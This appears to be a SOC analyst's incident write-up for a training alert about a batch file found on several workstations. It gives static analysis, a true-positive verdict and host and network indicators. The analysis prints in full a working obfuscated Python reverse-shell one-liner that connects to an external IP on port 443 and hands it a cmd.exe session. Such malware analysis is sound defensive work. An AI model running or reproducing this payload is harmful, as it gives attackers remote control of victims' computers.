# Case Details
- EventID : 68
- Event Time : Mar, 01, 2021, 03:16 PM
- Rule :SOC132 - Same Malicious File Found on Multiple Sources
- Level : Security Analyst
- Source Address : 172.16.17.14
- Source Hostname : MikeComputer, JohnComputer, Sofia
- File Name : msi.bat
- File Hash : 3dc649bc1be6f4881d386e679b7b60c8
- File Size : 2,12 KB
- Device Action : Cleaned
- Download (Password:infected) : 3dc649bc1be6f4881d386e679b7b60c8.zip

Upon unzipping it drops a file `msi.bat`

# Analysis

## Static Analysis

- Hash of said file, 3dc649bc1be6f4881d386e679b7b60c8 *msi.bat
- VirusTotal says it is clean, but on the code insight it says :

```txt
The code you provided is a Python script that creates a reverse shell. A reverse shell is a type of malware that allows an attacker to control a victim's computer remotely. The script first creates a socket connection to a remote server, then it creates two threads: one thread to read data from the remote server and send it to the victim's computer, and the other thread to read data from the victim's computer and send it to the remote server. This allows the attacker to control the victim's computer remotely.
```

- Let's take it a look for ourselves.

### Code analysis

```py
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('81.68.99.93', 443)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
- As stated by the code analysis, this appears to be a reverse shell, as we see it connecting back to the the IP on port 443, we also see import few proccess like `os,socket,subprocess`.

- `81.68.99.93` seems to be flagged by 1 vendor as malicious.
- Checking out the community page on VirusTotal,  `parthmaniar` on VT flags the IP to be doing SSH brute force attacks.


# Verdict
- While the file was not flagged as malicious by any scanners, the behavior of it is suspicious since it exists on multiple workstations and connecting to an external IP and sending and receiving data. Therfore this is a indeed a true positive.

## IOCS
### Host
- Check for file `msi.bat`, hash `3dc649bc1be6f4881d386e679b7b60c8`

### Network
- Check IP `81.68.99.93`
